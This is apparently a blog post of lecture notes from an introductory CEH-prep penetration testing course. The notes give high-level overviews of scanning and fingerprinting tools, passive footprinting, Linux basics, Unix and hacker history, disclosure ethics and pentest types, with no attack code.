  • Hping (more properly hping3…but since the CEH exam never gets updated, you may still see it referred to as hping2) is a very versatile and customizable tool for crafting TCP and UDP packets.  There’s a lot of overlap between it and nmap, but hping is good for more targetted probing of specific systems and ports.
  • Alive6 is a good tool when looking for IPv6 hosts
  • Fping is an older than dirt ping sweeper, as is netenum
  • Angry IP Scanner is a Windows tool

Screen Shot 2016-01-18 at 10.29.52 PM.png

Screen Shot 2016-01-18 at 10.29.53 PM.png

Screen Shot 2016-01-18 at 10.29.54 PM.png

Screen Shot 2016-01-18 at 10.29.55 PM.png

Screen Shot 2016-01-18 at 10.29.56 PM.png

Screen Shot 2016-01-18 at 10.29.58 PM.png

Screen Shot 2016-01-18 at 10.29.59 PM.png

  • Firewalk is specifically a tool for trying to figure out what ports are actually closed on a host and which are just being blocked by a firewall.  It uses some traceroute-fu to accomplish that.  We’ll discuss it more in the Evasion lesson later in the course.
  • Unicornscan is a more advanced host and port scanner, built around being fast and using its own custom-engineered TCP/IP stack.  Some like it…I just stick to nmap, personally.
  • Dmitry is a quick tool that does port scans…but can also do a little DNS bruting, whois lookups, and can check Netcraft for info on a server
  • SuperScan is a Windows TCP port scanner, freeware from McAfee

Screen Shot 2016-01-18 at 10.30.01 PM.png

Screen Shot 2016-01-18 at 10.30.03 PM.png

  • The idea behind fingerprinting is to look at the packets you receive and look for signs that point to a particular operating system’s TCP/IP stack.
  • TCP/IP is regulated by the RFC system…but different OS’s take different approaches and different liberties with implementing them, such as how they respond to illegal flags, TTL values, windows sizes, how they generate session numbers, etc.

Screen Shot 2016-01-18 at 10.30.04 PM.png

  • Default TTL (Time To Live) and window sizes vary between Windows and different Unix-like systems.
  • Most system have the DF (“Don’t Fragment”) bit set, but if it ISN’T set, it can be a dead giveaway to certain obscure Unix flavors (such as OpenBSD and SCO Unix)
  • TOS is of limited usefulness in fingerprinting OS’s.

Screen Shot 2016-01-18 at 10.30.06 PM.png

Screen Shot 2016-01-18 at 10.30.07 PM.png

Screen Shot 2016-01-18 at 10.30.08 PM.png

  • p0f requires that you be MiTMing traffic, as it’s a passive scanner.
  • Amap is an older scanning tool from the hacker collective THC.  Probably not as good as nmap, but maybe worth trying
  • Xprobe2 is an active fingerprinting tool

Screen Shot 2016-01-18 at 10.30.11 PM.png

  • Nesus used to be an open project, until it was bought up by Tenable Network Security.  Tenable closed-sourced it and pissed off lots of folks in the open source and security community.
  • In retaliation, the last open version of Nessus (version 2) was forked to formed the OpenVAS (Open Vulnerability Assessment System) project.
  • Nessus/OpenVAS scans are like artillery going off on a network…very loud and you will get noticed.  Not good for a sneaky pentest, but great if all you need is a vulnerability assessment.

Screen Shot 2016-01-18 at 10.30.12 PM.png

Screen Shot 2016-01-18 at 10.30.14 PM.png

  • Most of these scanners are commercial, so we won’t be playing with them.  Don’t worry, you won’t need to know any of them for the test.

Screen Shot 2016-01-18 at 10.30.17 PM.png


CNS320 Lesson 3 – Footprinting

Lesson 3 – Footprinting

Screen Shot 2016-01-18 at 9.09.03 PM.png

  • Footprinting is essential for scoping your target, as it will give you an idea of what sort of systems you’re attacking, what public IP ranges your target owns (attack surface), what domains
  • Footpringint is focused on *passive* reconnaissance.  You will learn as much as you can indirectly about the target first.  Then, you will have very controlled direct interaction with the target in the semi-passive phase.  Semi-passive footprinting should be largely indistinguishable from normal traffic (eg, do some DNS queries or look at their webpage, but don’t do brute-force reverse DNS lookups or hardcore crawling of every page, etc.)

Screen Shot 2016-01-18 at 9.09.08 PM.png

  • The idea is not to touch the target organization until you’ve gathered enough info indirectly

Screen Shot 2016-01-18 at 9.09.10 PM.png

  • CDN = content delivery network

Screen Shot 2016-01-18 at 9.09.11 PM.png

Screen Shot 2016-01-18 at 9.09.12 PM.png

Screen Shot 2016-01-18 at 9.09.13 PM.png

Screen Shot 2016-01-18 at 9.09.14 PM.png

Screen Shot 2016-01-18 at 9.09.15 PM.png

Screen Shot 2016-01-18 at 9.09.16 PM.png

  • For example, if you see the target company is looking to hire Oracle DBA’s on LinkedIn or Dice, then you can guess what sort of databases their running 🙂

Screen Shot 2016-01-18 at 9.09.17 PM.png

Screen Shot 2016-01-18 at 9.09.19 PM.png

Screen Shot 2016-01-18 at 9.09.20 PM.png

Screen Shot 2016-01-18 at 9.09.21 PM.png

Screen Shot 2016-01-18 at 9.09.23 PM.png

Screen Shot 2016-01-18 at 9.09.24 PM.png

Screen Shot 2016-01-18 at 9.09.25 PM.png

Screen Shot 2016-01-18 at 9.09.26 PM.png

  • ARIN = American Registry for Internet Numbers
  • RIPE NCC = Réseaux IP Européens Network Coordination Centre
  • APNIC = Asia Pacific Network Information Centre
  • LACNIC = Latin American and Carribean Network Information Center
  • AfriNIC = African Network Information Center

Screen Shot 2016-01-18 at 9.09.27 PM.png

Screen Shot 2016-01-18 at 9.09.29 PM.png

Screen Shot 2016-01-18 at 9.09.30 PM.pngScreen Shot 2016-01-18 at 9.09.31 PM.png

Screen Shot 2016-01-18 at 9.09.32 PM.png

Screen Shot 2016-01-18 at 9.09.34 PM.png

Screen Shot 2016-01-18 at 9.09.35 PM.png

Screen Shot 2016-01-18 at 9.09.36 PM.png

CNS320 Lesson 2 – Linux Fundamentals

Lesson 2 – Linux Fundamentals

I can’t emphasize enough how important it is to feel comfortable in Linux/Unix if you’re going to get serious about penetration testing.  My biggest complaint while I was teaching is that there was no Linux pre-req for my course.  I did my best to spin up the newbies or refresh those who hadn’t touched Linux in a while. By the end of the course, most of my students were compotent Linux command line users. I even got a student to change her opinion from “Linux sucks!” to “Linux is okay.” 😄

Screen Shot 2016-01-18 at 8.01.37 PM.png

  • Ken Thompson (left) and Dennis Ritchie (right) were computer scientists work at AT&T Bell Labs in the 1960’s and 1970’s.  They were originally working on a joint project with MIT, GE, and others called “Multics”.  Bell Labs ended up dropping out of the project, but Ken and Dennis took what they learned and used it to develop a hobby operating system (OS), that they jokingly called “UNIX.”
  • Ken’s motivation was to write an OS so that a computer game he was working on, called Space Travel, would work better on the unused PDP-7 computer they had in the lab.
  • More details on Unix history can be found here, in an excerpt from the book The Art of Unix Programming:

Screen Shot 2016-01-18 at 8.01.48 PM.png

  • Ken Thompson (seated) and Dennis Ritchie, hacking away on a DEC PDP-11.  Despite being the size of a set of bookcases, the PDP-11 series were considered “minicomputers” back then…because they were smaller than the IBM mainframes that took up entire rooms.
  • UNIX’s big claim to fame would be that large portions of it were eventally rewritten in the high-level C programming language (which was developed by Dennis Ritchie and others at Bell Labs), instead of the PDP-7 or PDP-11’s processor-specific assembly language.  This allowed UNIX to be easily rewritten for other platforms and contributed to its (and the C language’s) spread.
  • Also, at the time, AT&T still had a monopoly on telephone service and was barred from entering the computer market by the US Department of Justice.  As part of a settlement with the US DoJ, they had to freely and cheaply license any computer software they developed at Bell Labs.
  • Being cheaply distributed, in a high-level language, and with the source code included, made UNIX extremely popular in college computer science departments.
  • One of the earliest customers was the University of California, Berkley.  In 1977, they released the first Berkley Software Distribution (BSD), a collection of customizations and new software for UNIX.  Eventually, the BSD project would rewrite the entire UNIX kernel and become its own operating system.  The little devil cartoon is Beastie, the BSD mascot.

Screen Shot 2016-01-18 at 8.01.50 PM.png

  • The 1980’s, Richard M. Stallman (pictured) quit his job as an MIT researcher to found the GNU Project.  The idea was to make a totally free, open-source operating system that anyone could use and contribute to, free of any corporate ownership.
  • The project succeeded in developing tons of very useful tools, that many people would use with their existing UNIX operating system, such as the Bourner Again (bash) shell, the GNU Compiler Collection (gcc) and the GNU Debugger (gdb).
  • However, they never managed to develop a fully-functional OS kernel to replace the proprietary AT&T-developed one. There are people still working on it and it’s called GNU Hurd. You can even download a prototype and try it out, but it’s been stuck in development hell for decades.  Even if it is ever finished into a stable product, it would still just be a curiosity.  Someone else already solved the kernel problem…

Screen Shot 2016-01-18 at 8.01.51 PM.png

  • In 1984, AT&T agreed to break up the old telephone monopoly in exchange for being allowed to finally sell computers.  It thought it could turn the popularity of UNIX into a cash cow…but failed miserably in the end.  As several other companies (such as HP, IBM, and Sun) had already developed commercial UNIX distributions, AT&T kicked off what is called the “UNIX Wars,” trying to retake the market from all these competitors with their new Unix System V (as in Roman numeral for “5”).  All the ended up happening was that the market became a mess of look-alike, but incompatible, products trying to push different, competing standards.
  • In 1991, Finnish computer science student first shared his custom-built OS kernel on Usenet.  This would finally solve the problem of the missing GNU kernel and create a free and usable operating system that anyone could download, install, and even customize.  The other big innovation was that Linux was designed to run on IBM PC-compatible computers and could do the sort of advanced tasks that would normally require a very expensive UNIX workstation.

Screen Shot 2016-01-18 at 8.01.52 PM.png

  • Portable: can be easily rewritten for different processors and platforms, such as Intel x86, ARM, PowerPC, SPARC, etc.
  • Multi-tasking: it can run several different programs or tasks at the same time
  • Multi-user in a time-sharing configuration: it can support multiple users at the same time, who all share the system’s resources (CPU, RAM, disk space, etc.)

Screen Shot 2016-01-18 at 8.01.53 PM.png

  • Really, everything is represented by a file.  Including devices like the hard drive and CD-ROM, processes in memory, and even TCP/UDP ports
  • Linux cares whether the letters in file names and commands are upper-case or lower-case

Screen Shot 2016-01-18 at 8.01.55 PM.png

  • The big surviving commercial Unix distributions you’ll see in corporate environments are IBM AIX, Oracle Solaris (developed by Sun Microsystems before Oracle bought them), and Hewlett-Packard HP-UX.  Many of the older proprietary Unices have been replaced by free and open-source lookalikes like Linux and FreeBSD.
  • SCO had two Unices: OpenServer (which, believe it or not, started life as Xenix, Microsoft‘s own Unix distro) and UnixWare, which is bought from Novell.  SCO itself is dead and these two distros are now sold by a company called Xinuos
  • The weird little icon in the bottom left is the logo of Silcon Graphics Inc. (SGI) IRIX, a Unix distro used on SGI Iris workstations and popular in the early 3D graphics world.  It’s been dead for some years now.
  • Tru64 was the last Unix distribution produced at DEC, for the Alpha platform.  Some Alphas still get legacy support from HP (which ended up owning all of DEC’s intellectual property).  Otherwise, Tru64 is dead.

Screen Shot 2016-01-18 at 8.01.59 PM.png

  • The different BSD operating systems have always been free and open source.  Actually, if BSD hadn’t been mired in stupid lawsuits from AT&T in the late 80’s and 90’s, we’d probably be using it exclusively and Linux would’ve never happened.
  • The three big BSD distributions are FreeBSD, NetBSD, and OpenBSD.  FreeBSD and NetBSD were some of the first projects to spin off the original UC Berkley work.  OpenBSD is itself a fork of NetBSD, with a strong focus on making the OS as secure as possible.  There are numerous other forks off of FreeBSD, including Dragonfly BSD, GhostBSD, PC-BSD (with a focus on being very user-friendly, especially to people migrating from Windows), and many others.Screen Shot 2016-01-18 at 8.02.03 PM.png
  • Really, the biggest BSD-derived operating system is actually Mac OS X.
  • When Steve Jobs was forced out of Apple in the mid-80’s, he founded a company called NeXT.  NeXT produced high-end workstations with an easy-to-use graphical interface, running an OS derived from BSD Unix called NeXTSTEP.  Later, Apple would purchase NeXT, turn NeXTSTEP into Mac OS X, and Jobs would make his triumphant return to the CEO chair of Apple.

Screen Shot 2016-01-18 at 8.02.04 PM.png

  • From the beginning, people were free to take the Linux kernel, the GNU tools, and any other software they wanted a throw together a “distribution.”  There was never really any “official” Linux distribution, just whatever the community put together.
  • One of the big families is that of Red Hat, one of the biggest commercial Linux vendors.  Their flagship product is Red Hat Enterprise Linux (RHEL).  Fedora is their user desktop-oriented release that is maintained by a community of Red Hat employers and volunteer developers.  CentOS is a clone of RHEL for people who want the advantages of a server Linux OS but don’t want to purchase a Red Hat support contract.

Screen Shot 2016-01-18 at 8.02.05 PM.png

  • Another big and important family of distributions is the Debian family.
  • Members of the family include Ubuntu and Linux Mint, which both aim to be user-friendly and easy for Windows users to switch to.
  • Kali Linux is also derived from Debian.  Its predecessor, BackTrack Linux, was a fork of Ubuntu.
  • Knoppix isn’t as popular as it used to be, but was a pioneer in the concept of the “LiveCD” and “LiveUSB”: an operating system that could run from a CD-ROM or USB stick without having to install it onto a hard drive.
  • Tails (The Amnesic Incognito Live System) is a privacy and security-focused distro, popularly used by NSA leaker Edward Snowden, that forces all traffic to go over the Tor anonymizer network.

Screen Shot 2016-01-18 at 8.02.07 PM.png

  • Some other popylar Linux distros include:
  • SuSE Linux, another commercial Linux distribution that’s sold by Novell.
  • Arch and Gentoo are famous for their customizability and orientation towards power users
  • Puppy Linux is geared towards older or resource-constrained system
  • Slackware is one of the oldest Linux distributions
  • Don’t forget that Google Android itself is a derivative of Linux, though heavily modified.

Screen Shot 2016-01-18 at 8.02.08 PM.pngScreen Shot 2016-01-18 at 8.02.09 PM.png

Screen Shot 2016-01-18 at 8.02.10 PM.png

  • Sorry, you’re on your own here. You can easily download the ISO file for Linux Mint or another Linux distro and try installing it in VMware or VirtualBox.  It’s not that hard, I promise! 😉

Screen Shot 2016-01-18 at 8.02.12 PM.png

  • Tab completion – if you type part of a command or file name and hit the “Tab” key on your keyboard, Unix/Linux will try to guess what you mean.  If there’s more than one possibilities, hit “Tab” twice
  • Arrow keys – clicking the up or down arrow keys on your keyboard will move through the history of commands you’ve entered.  Also, some programs (such as vim) may use the H, J, K, L keys instead of the arrow keys.  This is a throwback to older keyboards from the 70’s.
  • Quotes and escape characters – if you have to enter a file name that has spaces, asterisks, or other special characters (that Linux would normally use when interpretting commands), you can either wrap the name in single-quotes, double-quotes, or use the backslash ( \ ) to “escape” those characters and tell Linux to ignore them.  Examples:   ls -al “Hello World *.txt”; ls -al ‘Hello World *.txt’; ls -al Hello\ World\ \*.txt
  • Scripting – just like batch or Powershell scripting in Windows, Linux shells have robust scripting languages that act like mini-programming languages.  These files might have a .sh file extension and, if you open them in a text editor, they will start with a hash symbol, an exclamation point, and the filepath of the shell they use, such as #!/bin/bash or #!/bin/sh
  • Package managers (apt, yum, pacman, ports, etc.) – package managers are built into almost every Linux distro and allow you to easy pull down new software from the internet and install it.  Debian uses the apt package management system and .deb installer files.
  • passwd – this is the command to change your or (if you’re an admin) another user’s password
  • su and sudo – su stands for “switch user” and sudo for “switch user and do this”; these utilities allow you to login as or perform an action as another user, usually the root user. Most Linux systems, for accountability and security, don’t let admins login as root, so they use a combination or su and sudo instead to perform root-level actions, like installing new software, changing system files, creating/deleting users, etc.
  • ln – this is the command to make a link, like making a shortcut in Windows
  • nano, vi/vim, and emacs – these are some of the most common text editors you’ll see on Linux/Unix systems.  Nano is the easiest to use, vi/vim are de facto standards and you’ll find them on any Unix system, and emacs is a very programmer-centric text editor
  • touch – this command will update the time stamp on a file or directory and is also a quick way to make a new blank file
  • top – this is a command-line system monitor program, much like Task Manager in Windows, where you can see and sort running processes by RAM usage, CPU utilization, PID, and other values
  • exit – this is a way of exitting or logging out of your session, you can use it to kill an ssh session or if you logged in as root using “su”, it would end root’s session and drop you back to your normal user session

Screen Shot 2016-01-18 at 8.02.13 PM.png

Screen Shot 2016-01-18 at 8.02.15 PM.png

CNS320 Lesson 1 – Introduction

Lesson 1 – Introduction

Screen Shot 2016-01-18 at 1.05.09 PM.png

  • “Responsible disclosure” means that, if you find an organization’s server is misconfigured, or their software has a bug that can be exploited, etc., you tell the company about it first and give them time to remediate before you disclose anything publicly
  • May also hear it called “coordinated disclosure”
  • “Full disclosure” is telling anyone and everyone about a vulnerability as early as possible, not necessary giving the target org any lead time
  • Many security professionals report vulnerabilities and give the company a deadline to fix it before the details will be published to a mailing list, blog, etc.

Screen Shot 2016-01-18 at 1.05.11 PM.png

  • Vulnerability – a weakness in the system design, implementation, software or code, or the lack of a mechanism
  • Threat – any agent, condition, or circumstance that could potentially cause harm, loss, damage, or compromise to an IT or data asset
  • Exploit – a piece of software, tool, or technique that takes advantage of a vulnerability; could lead to access, privilege escalation, denial of service, etc.
  • Exposure – when a vulnerability is reachable by a threat, who could then exploit it

Screen Shot 2016-01-18 at 1.05.12 PM.png

  • Phone phreaks, much like computer hackers, were part curious explorer and part petty criminal.  They were extremely interested in how the Bell telephone system worked and poked and prodded their way through…usually with the goal of successfully committing “toll fraud” or getting free long distance calls.  Before the final divestiture of the Bell System in 1984, long distance was extremely expensive.  For example, a Bell commercial from 1970 touts the new minimum rate of 70 cents for a three minute call, which adjusted for inflation would be $4.27 today.  And that was the (cheaper) weekend rate.  Phone phreaks figured out ways to game the phone system to give themselves free long distance calls and later free features like conference calling and call waiting.  As the telephone system has become harder to cheat, and phone calls get cheaper and cheaper, phone phreaking has almost disappeared.
  • Worth a read is the brief “Conscience of a Hacker” (AKA the Hacker Manifesto) by the Mentor:

Screen Shot 2016-01-18 at 1.05.13 PM.png

  • I could go back even further to Samuel Morse and the invention of the electric telegraph in 1837, but the telephone was a much more democratized invention.  Telegraphs were in special offices, controlled by specialist operators; telephones were in your house and you could use them whenever you wanted.  You could draw a parallel between mainframes and home PCs, maybe.
  • ARPANET was named for DARPA, the Defense Advanced Research Projects Agency, which funds new inventions for the US military.  Kind of like Q Branch from the James Bond novels and movies 😉
  • The telephone network laid the global infrastructure that would allow ARPANet (and other research networks) to involve into the Internet and interconnect computer systems across the planet.
  • ARPANET is also important for setting TCP/IP as the standard protocol stack for the future Internet.

Screen Shot 2016-01-18 at 1.05.15 PM.png

  • John Draper discovered that a toy whistle (that came as the free prize in a box of Cap’n Crunch cereal) produced the right 2600 hertz tone needed to open new trunk lines.  He used it as inspiration to build a tone-generating device for making free phone calls.  Steve Jobs and Steve Wozniak famously made and sold blue boxes before going on to found Apple.  Before blue boxes, some people had actually figured out how to whistle the right tones to fool the phone system.
  • BBS’s were like early forums, where members could post messages, send and receive email, share files, play games, etc.  This was before the Internet was available in people’s homes.  To reach a BBS, you had to dial its telephone number via your computer’s modem.  If the computer hosting the BBS only had one phone line connected to it, only one person could dial in and use it at a time.  If you dialed up a BBS in another city, you’d be paying long-distance rates by the minute to use it.  Much like today, BBS’s could also be havens for illegal file sharing, cracking copy-protected software, distributing porn, and other shady activities.
  • This actually created a natural progression from BBS user to phreaker to hacker.  Take for instance a kid who gets a modem and discovers a few BBS’s in his local area.  These lead him to the numbers of other BBS’s in other cities.  He calls them up, makes friends, plays cool games, shares files, and has a good time…until his parents’ phone bill comes!  After his parents get done grounding him, he probably sulks on the local boards, complaining about how he misses the new friends he made on those other boards and how stupid long-distance phone rates are.  A phreaker on the BBS tell him how to build a bluebox, or shares some stolen phone card #’s with him, so he can get back on those far-away BBS’s without any pesky long distance charges.  Our kid has just transitioned into a phone phreaker.  The next step is learning about you can sneak into corporate computers and look at all the cool stuff they have…maybe break into a game company’s computer and get a free copy of the hottest DOS game…or break into your school’s computer and change your grades!  Our teenager has finally made the leap to hacker.
  • Usenet is like a hybrid between email and internet forums, but very decentralized and spread out over multiple servers.  Like BBS’s, it was a popular way for computer hobbyists, hackers, and others to connect…but since Usenet was mostly run on big iron at research labs, universities, and corporations, it’s user base wasn’t as big.  Crusty old Usenet denizens used to hate the month of September, when they’d have to deal with all the n00b university students who just got their computer accounts and started stumbling into Usenet like idiots.  Once Usenet became available to home internet users in the 90’s, the crusty old Usenetters referred to it as “eternal September” because of the constant stream of newbies.  Usenet is still around, via Google and Yahoo Groups.  Paid usenet accounts are also popular for getting access to private newsgroups where you can pirate software, movies, TV shows, etc.  Probably won’t be long before the authorities start cracking down on it, like Napster and torrents before it.

Screen Shot 2016-01-18 at 1.05.16 PM.png

Screen Shot 2016-01-18 at 1.05.17 PM.png

  • US-CERT: US Computer Emergency Response Team
  • Some consider the 80’s the golden age of hacking. Many of the first hackers got their start in this era, whether through BBS’s, online services like CompuServe, or their university’s Unix mainframe and connection to the ARPANet.
  • A great book on this era, which I highly recommend, is Bruce Sterling’s The Hacker Crackdown, which you can buy on Amazon or read it for free online:

Screen Shot 2016-01-18 at 1.05.18 PM.png

  • EFF: Electronic Frontier Foundation
  • ISP: Internet Service Provider
  • DEC: Digital Equipment Corporation, makers of the influential PDP-11 and VAX computer lines that Unix grew up on.  Sadly no more, was bought out by Compaq in the late 1990’s, which was in turn bought by HP in 2002.

Screen Shot 2016-01-18 at 1.05.19 PM.png

  • Mitnick’s escapes are well-documented.  “Takedown,” by John Markoff and Tsutomu Shimomura, was written by some of the people who caught him the second time.  Mitnick has written several of his own books about hacking, including “Ghost in the Wires,” his account of his years on the run from the law.
  • DDoS: Distributed Denial-of-Service
  • Mitnick spent part of his imprisonment in solitary confinement after some of his underground enemies convinced authorities that he could start a nuclear war just by whistling into a pay phone.
  • Mitnick has written several books on his experiences, such as The Art of Intrusion and Ghost in the Wires

Screen Shot 2016-01-18 at 1.05.20 PM.png

Screen Shot 2016-01-18 at 1.05.22 PM.png

Screen Shot 2016-01-18 at 1.05.23 PM.png

Screen Shot 2016-01-18 at 1.05.24 PM.png

  • The biggest breach of 2013 was definitely the NSA 😉

Screen Shot 2016-01-18 at 1.05.26 PM.pngScreen Shot 2016-01-18 at 1.05.28 PM.pngScreen Shot 2016-01-18 at 1.05.29 PM.png

  • Script kiddie (or skiddie, for short) is a derogatory term for a cybercriminal who doesn’t know what the f**k he’s doing.  The stereotype is a minor who only knows how to download and clicky-clicky on attack tools he finds on  In reality, the majority of “cybercriminals” fit in this category.  Most are just petty criminals in Russia or other non-extradition countries who run exploit kits they bought on the darknet and steal bank account credentials and credit card numbers.
  • APT, or advanced persistent threat, is code-word for nation-sponsored hackers (Chinese PLA; Russian FSB, MVD, or GRU; American NSA, CYBERCOM; British GCHQ).  Lots of money, lots of talent, and lots of time on their hands to hack who and what they want.
  • The whole “cracker” deal has to do with white hats who feel that the term “hacker” has been misappropriated by the media and taken on a purely negative connotation.  They feel that “hacker” should still be used in the old sense, as in a skilled programmer or a technical genius, not a fat Russian cybercriminal who’s stealing credit card numbers by phishing your grandma on Facebook.
  • It’s mostly a losing battle.

Screen Shot 2016-01-18 at 1.05.30 PM.png

  • Hacktivists: a sub-class of gray hat; they may violate the law by breaking into a company without permission, but they were motivated to do it to uncover evidence that a company has been bribing politicians or dumping toxic waste in rivers, for example.
  • “Suicide hacker” is a stupid term you might see on the test.  Basically a hacker that doesn’t care if they get caught or if they hurt people.  I’ve never heard it used outside of EC-Council material.

Screen Shot 2016-01-18 at 1.05.31 PM.png

  • Money is an obvious motive (CC #’s, identity theft material like SSNs or other personal info, bank credentials, etc.)
  • Spies and cyberwarfare operatives are especially attracted to stealing sensitive info, like classified data, trade secrets, government communications, etc.
  • Some hackers are motivated by ideology, like Wikileaks contributors, some Anonymous or patriotic hackers like th3j3st3r
  • Some hackers pop boxes for street cred and respect within the underground
  • And some hackers are just a**holes who want to troll, damage sites, or commit the digital equivalent of vandalism, like many other Anons or Lizard Squad

Screen Shot 2016-01-18 at 1.05.33 PM.png

  • CFAA is the grand-daddy of hacking laws, has been expanded several times since first passing in 1986
  • ECPA expanded the laws that protect phone conversations to also include electronic communications, such as email, HTTP, etc.
  • CALEA expanded wiretapping laws to cover the Internet
  • DMCA imposes penalties for cracking DRM (digital rights management) or making and distributing tools for that purpose
  • CSEA was an amendment to the USA PATRIOT Act to make it easier for government to tap Internet lines and request information from ISPs in the name of homeland security

Screen Shot 2016-01-18 at 1.05.34 PM.png

  • I always be hackin’ in a tie and ski mask!
  • In fact, if you want to find out who’s attacking your company, just hack back the IP that was attacking you and look at them through the web cam.  If they’re wearing a dark hoodie, balaclava, or burglar mask, then you know you have the right guy!  #protip

Screen Shot 2016-01-18 at 1.05.35 PM.png

  • Shrink-Wrap Code: code that gets reused across lots of different software.  Prime examples would be the OpenSSL code libraries or the Cocoa Touch framework that all iOS apps build upon.  A weakness in a common library or method like that expands the attack surface considerably.

Screen Shot 2016-01-18 at 1.05.37 PM.png

  • These are the phases an attack by cybercriminal, APT, hacktivist, or other malicious actor

Screen Shot 2016-01-18 at 1.05.38 PM.png

Screen Shot 2016-01-18 at 1.05.39 PM.png

Screen Shot 2016-01-18 at 1.05.40 PM.png

Screen Shot 2016-01-18 at 1.05.41 PM.png

Screen Shot 2016-01-18 at 1.05.43 PM.png

Screen Shot 2016-01-18 at 1.05.44 PM.png

  • Audits are overwhelmingly concerned with making sure the right policies and procedures are in place and that they are being followed
  • Vulnerability assessments go as far as finding the weaknesses, but not actively attempting to exploit them
  • A penetration test goes all the way, finds the vulnerabilities AND exploits them to demonstrate what an attacker could do

Screen Shot 2016-01-18 at 1.05.45 PM.png

Screen Shot 2016-01-18 at 1.05.46 PM.png

  • White box: Full Knowledge.  You have complete information on the network, ranges, systems, infrastructure, etc.  Usually used to simulate an insider attack.
  • Black box: No Knowledge.  You might not know anything except the name of the company and have to discover/reconnoiter everything yourself.  Usually used to simulate an outside attack.
  • Gray box: Partial Knowledge.  Somewhere in the middle; client gives you some information, but not everything.  This is the most common sort of pentest.

Screen Shot 2016-01-18 at 1.05.48 PM.png

Screen Shot 2016-01-18 at 1.05.49 PM.png

Screen Shot 2016-01-18 at 1.05.50 PM.png

Screen Shot 2016-01-18 at 1.05.52 PM.png

Screen Shot 2016-01-18 at 1.05.53 PM.png

Screen Shot 2016-01-18 at 1.05.54 PM.png

  • E&O = Errors & Omissions

Screen Shot 2016-01-18 at 1.05.55 PM.png

Screen Shot 2016-01-18 at 1.05.56 PM.png

Screen Shot 2016-01-18 at 1.05.57 PM.png

  • This will all be discussed in more depth in future lessons.

Screen Shot 2016-01-18 at 1.05.59 PM.png

  • Threat modeling is a little outside the scope of this class.  The overall point is to focus your attacks or defense based on what sort of people and/or organizations threaten you.  Obviously, if you’re trying to defend against APT, your threat model is going to be extremely different from someone whose only threat is script kiddies defacing their website.

Screen Shot 2016-01-18 at 1.06.01 PM.png

Screen Shot 2016-01-18 at 1.06.02 PM.png

Screen Shot 2016-01-18 at 1.06.00 PM.png

Screen Shot 2016-01-18 at 1.06.04 PM.png

Screen Shot 2016-01-18 at 1.06.06 PM.png

  • The best way to experiment with Kali Linux is to download the official VM or the ISO file and run it inside virtualization software.  If you’re on Windows or Linux, VMware or Virtualbox are both free and work great.  If you’re on Mac, Virtualbox is the only free option available to you.  There are numerous tutorials and instructions on how to install it on the Kali Linux website.

CNS320 – Intro to Penetration Testing

In 2015, I had the good fortune to come upon a part-time gig teaching a course at a local community college in the Louisville, KY area.  The course’s goal was to prepare students to sit for the EC-Council Certified Ethical Hacker (CEH) exam.  Say what you will about CEH, and EC-Council for that matter, but CEH is a decent introduction to the concepts behind penetration testing.  Plus, more and more job listings are asking for it, so it’s one of those all-important HR filter bypasses you can purchase for $500…much like the CISSP.  It won’t make you into a penetration tester, but it at least demonstrates that you understand the concepts and can navigate a Linux command-line and use nmap without looking like a moron.

I was able to land in infosec right out of college, joining a consulting firm in Chicago.  I’ve done policy work, security architecture, vulnerability remediation, and other tasks, but I always wanted to break into penetration testing.  My job at the time allowed me a few opportunities to get in on pentests, but it was far from my primary responsibility.  Unfortunately, the Louisville area didn’t have very many pentesting opportunities and breaking in to such an area of expertise is hard.  I’d gotten the CEH back in 2010, with my eye on using it as a foot in the door, and had alerts set up on several job sites to inform me of any jobs with keywords like “penetration testing,” “CEH,” or “hacking” in them.  That was how the adjunct instructor gig came to my attention.

I say I was fortunate to find it for several reasons.  One, I’ve always loved teaching and presenting, and sharing knowledge with some really great students is it’s own reward.  Two, it helped reinforce my own knowledge of the field and actually helped me to blow ’em away in the interviews when a penetration testing job opportunity finally did come along.  Really, there is no better way to learn a subject, inside and out, than to teach it to others.  It forces you to build a deep, comprehensive knowledge of that subject so that you’re prepared to answer any question from your students and clear up any confusion they may have.  For example, my own understanding of buffer and heap overflows was pretty shallow until I was forced to explain it to students with almost no background in C programming.

I taught two semesters of this course before landing my current job, which forced me to relocate to Raleigh, NC.  Since those PPTX files are just gathering dust, I figured I’d post them here publicly and see if anyone else gets some good out of them.

The original course was at night’s, twice a week for 11 weeks, and each class was about four hours long. I’ll post pics and notes Obviously, I can’t simulate all of the original lab conditions here…but where applicable, I’ll direct you to some online tutorials that’ll show you how you can do it on your own, using VMs or whatever.

The original course was supposed to be based on EC-Council’s official training material (Ethical Hacking & Countermeasures).  EC-Council normally requires you attend their sanctioned training or boot camps before they allow you to sit for their exam, otherwise you can apply for a self-study waiver if you have a year or more of experience in information security.  By teaching from their books, this was how they allowed students to sit for the exam.

EC-Council’s official training material is mostly garbage, and I don’t say that lightly. Very poorly edited, typos and formatting errors abound, at times an incoherent mess of constantly jumping between topics, and I never saw a screenshot of a system newer than Windows XP.  I used the books as a vague outline of what topics I should cover, then wrote all the presentations myself using different resources to fill in the needed information.  Overall, I tried to make the training look more like the OSCP, with a big focus on hands-on labs and CTFs, with a big dose of irreverent humor injected into them.  These were 4 hour-long classes, after all, so I had to keep the students’ attention!

At the front of each lesson, I’ll include a link to download the original PPTX file.  I actually use the Notes section beneath each slide, so make sure you’re reading it in order to get all the info.  Maybe someday I’ll come back and film YouTube videos of these in proper lecture format.

I hope you enjoy them and that you or your friends can use them to better understand the world of penetration testing.  If you have any questions or comments, please hit me up on Twitter (either by tweet or DM) at @ch1kpee.